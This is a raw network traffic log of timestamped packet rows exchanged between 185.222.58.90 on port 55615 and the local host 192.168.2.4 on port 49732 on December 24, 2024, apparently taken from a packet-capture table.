Dec 24, 2024 09:07:21.425187111 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.425241947 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.425266027 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.425312042 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.425559998 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.425610065 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.425880909 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.425932884 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.425985098 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.426043987 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.426103115 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.426131964 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.426155090 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.426163912 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.426172018 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.426202059 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.426259995 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.426307917 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.427479982 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.427532911 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428175926 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428227901 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428319931 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428463936 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428492069 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428499937 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428531885 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428541899 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428558111 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428591013 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428591967 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428638935 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428657055 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428687096 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428711891 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428723097 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428745985 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428777933 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428796053 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428814888 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428857088 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428921938 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428936005 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428951025 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.428982019 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.428992033 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429027081 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429080009 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429099083 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429111958 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429120064 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429155111 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429162979 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429192066 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429234028 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429245949 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429251909 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429289103 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429292917 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429337978 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429367065 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429374933 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429399967 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429421902 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429450035 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429455042 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429491997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429500103 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429537058 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429559946 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429588079 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429620028 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429640055 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429672003 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429685116 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429713011 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429730892 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429761887 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429790020 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429816008 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429836988 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429855108 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429907084 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429929972 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.429971933 CET	49732	55615	192.168.2.4	185.222.58.90
Dec 24, 2024 09:07:21.429980040 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430011988 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430066109 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430078030 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430136919 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430138111 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430208921 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430237055 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430277109 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430305004 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430358887 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430387974 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430452108 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430488110 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430536985 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430548906 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430665970 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430675030 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430749893 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430759907 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430893898 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430917978 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.430944920 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431039095 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431050062 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431090117 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431130886 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431168079 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431255102 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431265116 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431333065 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431341887 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431418896 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431427956 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431489944 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431509972 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431596041 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431746960 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431762934 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431772947 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431824923 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431842089 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431940079 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431948900 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.431997061 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432030916 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432118893 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432128906 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432173967 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432226896 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432301998 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432311058 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432342052 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432499886 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432508945 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432518959 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432581902 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432591915 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432670116 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432679892 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432771921 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432781935 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432867050 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432876110 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432904959 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.432914972 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433013916 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433022976 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433052063 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433062077 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433227062 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433235884 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433284044 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433293104 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433326006 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433371067 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433476925 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433491945 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433588028 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433598042 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433661938 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433670044 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433728933 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433737993 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433839083 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433851957 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433928013 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.433943033 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434020996 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434029102 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434122086 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434130907 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434186935 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434257030 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434387922 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434397936 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434442997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434452057 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434500933 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434509993 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434571981 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434581041 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434649944 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434659004 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434699059 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434732914 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434773922 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434792042 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434859991 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434901953 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434973955 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.434986115 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435064077 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435074091 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435127020 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435143948 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435182095 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435240984 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435376883 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435388088 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435398102 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435408115 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435417891 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435473919 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435482979 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435492039 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435529947 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435539007 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435601950 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435611010 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435651064 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435695887 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435739040 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435750961 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435842037 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435867071 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435919046 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435929060 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435940981 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.435997009 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436073065 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436081886 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436125994 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436135054 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436173916 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436183929 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436297894 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436306953 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436323881 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436332941 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436342955 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436391115 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436475039 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436486006 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436510086 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436530113 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436582088 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436618090 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436700106 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436702013 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436754942 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436764956 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436821938 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436840057 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436882973 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436892986 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436980009 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.436989069 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437005997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437019110 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437097073 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437107086 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437148094 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437156916 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437252998 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437262058 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437304020 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437313080 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437378883 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.437387943 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.464643002 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.464673996 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.464705944 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.464734077 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.540611982 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.540720940 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.540754080 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.540833950 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.540965080 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541028023 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541059971 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541134119 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541337967 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541388035 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541419029 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541480064 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541743040 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541882992 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541914940 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.541996002 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542186975 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542237997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542290926 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542319059 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542351007 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542422056 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542586088 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542614937 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542701960 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542784929 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542892933 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.542939901 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543107986 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543157101 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543256044 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543307066 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543447018 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543474913 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543617964 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543668032 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543782949 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543829918 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.543966055 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544138908 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544167995 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544198036 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544261932 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544290066 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544414997 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544464111 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544617891 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544667006 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544918060 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.544972897 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545120955 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545167923 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545267105 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545294046 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545325041 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545424938 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545458078 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545523882 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545695066 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545722961 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545775890 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545823097 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.545978069 CET	55615	49732	185.222.58.90	192.168.2.4
Dec 24, 2024 09:07:21.546053886 CET	55615	49732	185.222.58.90	192.168.2.4
